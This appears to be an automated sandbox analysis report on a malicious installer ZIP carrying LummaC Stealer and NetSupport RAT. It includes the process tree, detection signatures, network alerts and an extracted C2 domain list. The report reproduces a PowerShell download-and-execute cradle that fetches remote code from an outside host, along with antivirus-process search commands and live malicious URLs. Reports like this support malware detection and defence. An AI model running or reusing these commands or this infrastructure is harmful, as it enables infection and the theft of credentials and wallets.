Edit tour

Windows Analysis Report
installer_1.05_36.4.zip

Overview

General Information

Sample name:	installer_1.05_36.4.zip
Analysis ID:	1581027
MD5:	fa2d5db52457d89d27b5d216bca32d78
SHA1:	a34f683167ad199013782d71e3071469e47e484b
SHA256:	9e8632f63da4af51c0b1754a0dd605df455e46aa099da11616e74938c39cdad5
Infos:

Detection

NetSupport RAT, LummaC, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64_ra

rundll32.exe (PID: 6956 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

7zG.exe (PID: 744 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\installer_1.05_36.4\" -spe -an -ai#7zMap8006:94:7zEvent16868 MD5: 50F289DF0C19484E970849AAC4E6F977)

installer_1.05_36.4.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe" MD5: 911D5567537C6BB8413884309387BB54)

cmd.exe (PID: 1992 cmdline: "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3688 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6836 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7012 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7016 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3424 cmdline: cmd /c md 709182 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 6336 cmdline: extrac32 /Y /E Bet MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 1460 cmdline: findstr /V "brandon" M MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6612 cmdline: cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Lightweight.com (PID: 2920 cmdline: Lightweight.com N MD5: 62D09F076E6E0240548C2F837536A46A)

powershell.exe (PID: 2884 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2424 cmdline: powershell -exec bypass MZP MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 1360 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

notepad.exe (PID: 988 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\Read me before you start.txt MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["laborersquei.click", "screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "scentniej.buzz", "prisonyfork.buzz", "rebuildeso.buzz"], "Build id": "jMw1IE--psyche"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: 7zG.exe PID: 744	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: Lightweight.com PID: 2920	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
10.3.7zG.exe.1bfd0a76ee0.1.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Lightweight.com N, ParentImage: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com, ParentProcessId: 2920, ParentProcessName: Lightweight.com, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2884, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1992, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7016, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T18:26:15.238752+0100	2028371	3	Unknown Traffic	192.168.2.16	49708	172.67.166.49	443	TCP
2024-12-26T18:26:17.574360+0100	2028371	3	Unknown Traffic	192.168.2.16	49709	172.67.166.49	443	TCP
2024-12-26T18:26:20.168775+0100	2028371	3	Unknown Traffic	192.168.2.16	49710	172.67.166.49	443	TCP
2024-12-26T18:26:22.623747+0100	2028371	3	Unknown Traffic	192.168.2.16	49711	172.67.166.49	443	TCP
2024-12-26T18:26:25.098426+0100	2028371	3	Unknown Traffic	192.168.2.16	49712	172.67.166.49	443	TCP
2024-12-26T18:26:27.450829+0100	2028371	3	Unknown Traffic	192.168.2.16	49713	172.67.166.49	443	TCP
2024-12-26T18:26:29.931478+0100	2028371	3	Unknown Traffic	192.168.2.16	49714	172.67.166.49	443	TCP
2024-12-26T18:26:32.092068+0100	2028371	3	Unknown Traffic	192.168.2.16	49715	172.67.166.49	443	TCP
2024-12-26T18:26:34.310326+0100	2028371	3	Unknown Traffic	192.168.2.16	49716	172.67.166.49	443	TCP
2024-12-26T18:26:36.436579+0100	2028371	3	Unknown Traffic	192.168.2.16	49717	172.67.166.49	443	TCP
2024-12-26T18:26:39.389022+0100	2028371	3	Unknown Traffic	192.168.2.16	49718	185.161.251.21	443	TCP
2024-12-26T18:26:41.577184+0100	2028371	3	Unknown Traffic	192.168.2.16	49719	172.67.214.186	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T18:26:16.259072+0100	2054653	1	A Network Trojan was detected	192.168.2.16	49708	172.67.166.49	443	TCP
2024-12-26T18:26:18.350202+0100	2054653	1	A Network Trojan was detected	192.168.2.16	49709	172.67.166.49	443	TCP
2024-12-26T18:26:37.202088+0100	2054653	1	A Network Trojan was detected	192.168.2.16	49717	172.67.166.49	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T18:26:16.259072+0100	2049836	1	A Network Trojan was detected	192.168.2.16	49708	172.67.166.49	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T18:26:18.350202+0100	2049812	1	A Network Trojan was detected	192.168.2.16	49709	172.67.166.49	443	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T18:26:42.505942+0100	2008438	1	A Network Trojan was detected	172.67.214.186	443	192.168.2.16	49719	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T18:26:28.215871+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.16	49713	172.67.166.49	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPK	Avira URL Cloud: Label: malware
Source: https://klipsyzogey.shop/	Avira URL Cloud: Label: malware
Source: https://klipsyzogey.shop/int_clp_sha.txt	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["laborersquei.click", "screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "scentniej.buzz", "prisonyfork.buzz", "rebuildeso.buzz"], "Build id": "jMw1IE--psyche"}

Sample uses string decryption to hide its real strings

Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: laborersquei.click
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: laborersquei.click
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jMw1IE--psyche

Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_3efff8b4-4

Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.16:49719 version: TLS 1.2

Source:	Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdbu source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.2167934211.00000000088FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64.exe
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
Source:	Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb+ source: winrar-x64.exe
